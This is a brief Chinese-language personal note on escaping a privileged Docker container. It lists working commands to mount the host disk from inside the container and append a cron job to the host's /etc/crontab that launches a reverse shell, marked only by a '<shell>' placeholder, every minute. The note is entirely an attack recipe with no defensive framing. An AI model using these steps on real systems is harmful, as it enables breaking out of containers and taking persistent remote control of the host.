【笔记】Docker逃逸漏洞利用

前言

Docker逃逸漏洞利用

容器以特权模式运行

查看挂载的设备编号

1
fdisk -l
1
/dev/vda1

将设备挂载到容器内

1
mount /dev/vda1 /mnt

在真机添加计划任务

<shell>:反弹Shell命令

1
echo "*/1 * * * * root /bin/bash -c '<shell>'" >> /mnt/etc/crontab

完成